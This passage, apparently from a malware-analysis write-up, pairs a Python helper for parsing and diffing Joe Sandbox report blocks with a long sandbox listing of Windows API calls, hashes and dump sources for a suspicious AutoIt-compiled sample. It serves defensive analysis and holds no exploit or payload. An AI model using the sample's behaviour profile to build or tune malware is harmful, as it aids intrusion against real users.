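        tags.append("process-handle")
    return tags

def index_by_api_string_id(blocks: list[FunctionBlock]) -> dict[str, list[FunctionBlock]]:
    """Group blocks by Joe Sandbox's API String ID so two reports can be diffed."""
    index: dict[str, list[FunctionBlock]] = {}
    for b in blocks:
        if key := b.meta.get("API String ID"):
            index.setdefault(key, []).append(b)
    return index
```

Run parse_blocks over a whole saved listing, feed the result to index_by_api_string_id for this report and for a known-clean AutoIt-compiled binary, and the IDs present in both are runtime functions that can be set aside; what remains is where the script-specific behaviour lives. The "?" markers are kept as-is in args because the sandbox could not recover those values, so a rule that needs an argument must check for them rather than assume a hex string.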
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DBAA5
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DBB00
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004DBB63
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 004DBBA6
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DBBB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 826366716-0
                                                                                • Opcode ID: e1628b72971712476fd4212b9bce7d1329d49797e8677d179404d2256214b1d2
                                                                                • Instruction ID: bdab7a8a5ced6753931f5f6ab87d2e75d7851e0a5f23e812f40c9d0b98d3cbea
                                                                                • Opcode Fuzzy Hash: e1628b72971712476fd4212b9bce7d1329d49797e8677d179404d2256214b1d2
                                                                                • Instruction Fuzzy Hash: 0A616A31208241EFC714DF14C8A0E2ABBE5EF84308F55895EF4994B3A2DB35ED46CB96
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004B8BCD
                                                                                • VariantClear.OLEAUT32 ref: 004B8C3E
                                                                                • VariantClear.OLEAUT32 ref: 004B8C9D
                                                                                • VariantClear.OLEAUT32(?), ref: 004B8D10
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004B8D3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: e774bcc6e902446e2baa4ec44179fd0c09f7227e9c2debf2e9b3e86da5a7c0ae
                                                                                • Instruction ID: ecf6d840093819321dd23be7e7e914885e58e0fcc7c0324841140a935cd3cdbe
                                                                                • Opcode Fuzzy Hash: e774bcc6e902446e2baa4ec44179fd0c09f7227e9c2debf2e9b3e86da5a7c0ae
                                                                                • Instruction Fuzzy Hash: DA516DB5A00219DFCB10CF68D894AEAB7F8FF89314B15855AE905DB350D734E911CFA4
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004C8BAE
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004C8BDA
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004C8C32
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004C8C57
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004C8C5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: 102c9dc33981500758902bf9e70a1df3b2b5c09c0b807f12f90ca61bfb347e13
                                                                                • Instruction ID: 85c21d943059fe8e9ec827d25a267736269a1d59acd70e6db482de317d0ed2f0
                                                                                • Opcode Fuzzy Hash: 102c9dc33981500758902bf9e70a1df3b2b5c09c0b807f12f90ca61bfb347e13
                                                                                • Instruction Fuzzy Hash: AA515E35A00218AFCB00DF65C880E6ABBF5FF49318F08805DE849AB362DB35ED55CB94
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 004D8F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D8FD0
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004D8FEC
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D9032
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004D9052
                                                                                  • Part of subcall function 0046F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004C1043,?,753CE610), ref: 0046F6E6
                                                                                  • Part of subcall function 0046F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004AFA64,00000000,00000000,?,?,004C1043,?,753CE610,?,004AFA64), ref: 0046F70D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: f20ce0b3ad84bd9f26a50a2a66d97ab827ca944476637c7770a2e54eff240443
                                                                                • Instruction ID: 7fbab859300cd13ae53c770948070849a22851b18b1289be4fd270603c644078
                                                                                • Opcode Fuzzy Hash: f20ce0b3ad84bd9f26a50a2a66d97ab827ca944476637c7770a2e54eff240443
                                                                                • Instruction Fuzzy Hash: EF513B35600205DFC715EF69C4948ADBBF1FF49318B0480AEE8459B362DB35ED8ACB95
                                                                                APIs
                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 004E6C33
                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 004E6C4A
                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004E6C73
                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004CAB79,00000000,00000000), ref: 004E6C98
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004E6CC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MessageSendShow
                                                                                • String ID:
                                                                                • API String ID: 3688381893-0
                                                                                • Opcode ID: 6e71ccd5161b84b954db03eb2ffb974cb24345a01f97387eaad83ee5528fb7fd
                                                                                • Instruction ID: bfb77c1cb84d3236f08036cf6894c5b0378bcbdbcb1f11f78f24bded373ac0ce
                                                                                • Opcode Fuzzy Hash: 6e71ccd5161b84b954db03eb2ffb974cb24345a01f97387eaad83ee5528fb7fd
                                                                                • Instruction Fuzzy Hash: 7841F935600194AFD724CF3ACC84FA67BA4EB19391F26022AFD95A73E1C375ED41C648
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 1fef0180453f7d1c2559ad33661ded7db70e6717977578823f1919f88c90a950
                                                                                • Instruction ID: fd6a5681b5c7c79d6da7d692cca0f36eeafa61d7de45f9f72ed8165d60f7c1b0
                                                                                • Opcode Fuzzy Hash: 1fef0180453f7d1c2559ad33661ded7db70e6717977578823f1919f88c90a950
                                                                                • Instruction Fuzzy Hash: 56410472A002009FCB20EF79C984A5EB7E1EF89314F25896AE615EB391D775ED01CB85
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00469141
                                                                                • ScreenToClient.USER32(00000000,?), ref: 0046915E
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00469183
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0046919D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 3478a9299a0400a2eed0ee24435310c49e5c76b539e1031caa54568332d8e43e
                                                                                • Instruction ID: cdfde70832719423e881d976feb25c9ef5b055336dd6999a764fda51193bcd94
                                                                                • Opcode Fuzzy Hash: 3478a9299a0400a2eed0ee24435310c49e5c76b539e1031caa54568332d8e43e
                                                                                • Instruction Fuzzy Hash: AC419271A0821AFBDF159F64C844BEEB7B8FB06324F20422AE425A73D0D7785D51CB96
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 004C38CB
                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 004C3922
                                                                                • TranslateMessage.USER32(?), ref: 004C394B
                                                                                • DispatchMessageW.USER32(?), ref: 004C3955
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004C3966
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: 104c0fa2dc836efaa6a81ebadec3bb35c61cb9ae4df5245077574903169a7117
                                                                                • Instruction ID: 128dba720f2c012306bb89ab16eb5a02edd89244321442b01e2dfc4ddc3fff4a
                                                                                • Opcode Fuzzy Hash: 104c0fa2dc836efaa6a81ebadec3bb35c61cb9ae4df5245077574903169a7117
                                                                                • Instruction Fuzzy Hash: 9E31DDB45047829EEB75CF349848F7737E4AF26305F04856FD45286290D3B89686DB1D
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCF38
                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004CCF6F
                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFB4
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFC8
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                • String ID:
                                                                                • API String ID: 3191363074-0
                                                                                • Opcode ID: 869010d13b13afa1f4467826879f145fda68b079195a53fccdfa5bcbb8e3f166
                                                                                • Instruction ID: 119fe2d349f9660806af13827b9fde6e761ac7533c6815b27c1fbec909cf7b53
                                                                                • Opcode Fuzzy Hash: 869010d13b13afa1f4467826879f145fda68b079195a53fccdfa5bcbb8e3f166
                                                                                • Instruction Fuzzy Hash: 2A317F75900205EFDB60DFA5D8C4EABBBFAEB04314B10446FF51AD6281E738ED419B68
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 004B1915
                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 004B19C1
                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 004B19C9
                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 004B19DA
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004B19E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 67647ae661e3c0c6b2b84be084d0523a5484a931b2d2706a35ba93faf3bf7964
• Instruction ID: 9368e60f4f09f495132916533d0570b387f17596fcdec7215b8e49cb85f6accc
• Opcode Fuzzy Hash: 67647ae661e3c0c6b2b84be084d0523a5484a931b2d2706a35ba93faf3bf7964
• Instruction Fuzzy Hash: D431E4B1900259EFCB00CFA8CD98ADF7BB5EB04314F004226F921AB2E1C3749945CBA4
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 004E5745
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004E579D
• _wcslen.LIBCMT ref: 004E57AF
• _wcslen.LIBCMT ref: 004E57BA
• SendMessageW.USER32(?,00001002,00000000,?), ref: 004E5816
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: f48b3f32c8712dc6baeb0e99f95086b8939aa30007cf6f005f97a126d235ee90
• Instruction ID: 39f4cdc8676a8866c38746a5e6007f17acded086a638ff7449b73bbfa28464a1
• Opcode Fuzzy Hash: f48b3f32c8712dc6baeb0e99f95086b8939aa30007cf6f005f97a126d235ee90
• Instruction Fuzzy Hash: 9821A7719046989ADB20DF62CC84AEE7778FF04329F108217E919DB2C1D7748985CF59
APIs
• IsWindow.USER32(00000000), ref: 004D0951
• GetForegroundWindow.USER32 ref: 004D0968
• GetDC.USER32(00000000), ref: 004D09A4
• GetPixel.GDI32(00000000,?,00000003), ref: 004D09B0
• ReleaseDC.USER32(00000000,00000003), ref: 004D09E8
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 452e1be08ff62ba4cafc211acda8119206dad9cd250aad6cb627c26e3a3bbccd
• Instruction ID: f3977322c7edcb369f810050333e0939211247eedf678b8cd2628485cb69d0cc
• Opcode Fuzzy Hash: 452e1be08ff62ba4cafc211acda8119206dad9cd250aad6cb627c26e3a3bbccd
• Instruction Fuzzy Hash: DD21A175600204AFD704EF69C894EAEBBE5EF44704F00807EE84ADB362DB34AC05CB94
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0048CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048CDE9
  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0048CE0F
• _free.LIBCMT ref: 0048CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048CE31
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: cff37b1021203a4c7c984b9f212cee9aee39ff7b70cfd21175b84603f2658f87
• Instruction ID: 8731bd927e151461863007937a881e210c9f941fade8ab3ba0f58189c6c80b24
• Opcode Fuzzy Hash: cff37b1021203a4c7c984b9f212cee9aee39ff7b70cfd21175b84603f2658f87
• Instruction Fuzzy Hash: 9D01D4726012557F23213ABA6CC8C7F696DDFC6BA1315052FFD05C7201EA788D0283B8
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
• SelectObject.GDI32(?,00000000), ref: 004696A2
• BeginPath.GDI32(?), ref: 004696B9
• SelectObject.GDI32(?,00000000), ref: 004696E2
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: feb6a1463d2ebd40287c37fc6d4b90bb8ac2cccdc7f7a4cc3db4c80ea62712a9
• Instruction ID: e6407285554fd42b592b9c672f0ce0035e457a91f10de16a4e1503a1f05393c1
• Opcode Fuzzy Hash: feb6a1463d2ebd40287c37fc6d4b90bb8ac2cccdc7f7a4cc3db4c80ea62712a9
• Instruction Fuzzy Hash: 05214C70802749EBDB219F64DC447AB7B69BF32315F100226F410961B1E3B85C9BEB9E
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 0a9dca4f37dc450cb5ae7afae9aa81646e32d39eb1eb10b77513d8250a021b76
• Instruction ID: f85a4c261ad5d736144c7814db7d4c1b5ff4d5e86f5d40c1764f9d3e3bcb4b11
• Opcode Fuzzy Hash: 0a9dca4f37dc450cb5ae7afae9aa81646e32d39eb1eb10b77513d8250a021b76
• Instruction Fuzzy Hash: 22019671741605BAB20855169D42FFBB35C9B21399F204037FD089A641FA6CEE1582BD
APIs
• GetLastError.KERNEL32(?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6), ref: 00482DFD
• _free.LIBCMT ref: 00482E32
• _free.LIBCMT ref: 00482E59
• SetLastError.KERNEL32(00000000,00451129), ref: 00482E66
• SetLastError.KERNEL32(00000000,00451129), ref: 00482E6F
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: e775ae2ee1c24b00ca2220bbb8fe5b441c375fcd14d6c183d7be70036352f7f2
• Instruction ID: ca19448120cee76e731c09f37ea18e034953b99fbb6613b60ae7a966b394a3d3
• Opcode Fuzzy Hash: e775ae2ee1c24b00ca2220bbb8fe5b441c375fcd14d6c183d7be70036352f7f2
• Instruction Fuzzy Hash: 7C01D67228560067861237396E85D3F1559AFD1769B214C2BF825A22D3EBAC8802832C
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?,?,004B035E), ref: 004B002B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0046
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0054
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?), ref: 004B0064
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0070
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 33888b51a7025070253a6932a2c96c38b73bef0e4034cc1f1bf643e9e34d7c02
• Instruction ID: d6c30c212f01e256d5a4e418107867a1aa0ca3134124eebec1af544975e0b167
• Opcode Fuzzy Hash: 33888b51a7025070253a6932a2c96c38b73bef0e4034cc1f1bf643e9e34d7c02
• Instruction Fuzzy Hash: 4F018B72600204BFDB116F68EC84BEB7AADFB44793F144125F905EA211EB79DD418BA4
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 004BE997
• QueryPerformanceFrequency.KERNEL32(?), ref: 004BE9A5
• Sleep.KERNEL32(00000000), ref: 004BE9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 004BE9B7
• Sleep.KERNEL32 ref: 004BE9F3
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: d7a781e61fb6d1acf8758fa38b3048727936a6ab5adf6455ef6d04c43d38183e
• Instruction ID: 314cb6233a28e0b787f67797ae1da2031fbaddf6509e89d5165a76f4e9edd6d3
• Opcode Fuzzy Hash: d7a781e61fb6d1acf8758fa38b3048727936a6ab5adf6455ef6d04c43d38183e
• Instruction Fuzzy Hash: 51012D71C01529DBCF009FE6DD996EDFB78FF49701F000556E502B6241CB38955ACBAA
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
• GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 6ce605d21eddaaee77b9d662d49912067baf266a5483eb880188bd677b70bd7f
• Instruction ID: 47ce42ff8fc2d64c3f5421635dbffcb67a450f964b79e9977aca82d2b1dfad9b
• Opcode Fuzzy Hash: 6ce605d21eddaaee77b9d662d49912067baf266a5483eb880188bd677b70bd7f
• Instruction Fuzzy Hash: BF011D75100205BFDB114FA9DC99AAB3B6EEF8A360B504429FA45D7361DA31DC019A74
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B0FCA
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B0FD6
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B0FE5
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B0FEC
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B1002
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: cd505c0b8730582cd31cb3585e9a3a9f1898ad58741a3f97894d915453a00b7e
                                                                                • Instruction ID: 9566d6453651bfeddf8f800533ad73362c86cbd6c40233cda28abafa6308174c
                                                                                • Opcode Fuzzy Hash: cd505c0b8730582cd31cb3585e9a3a9f1898ad58741a3f97894d915453a00b7e
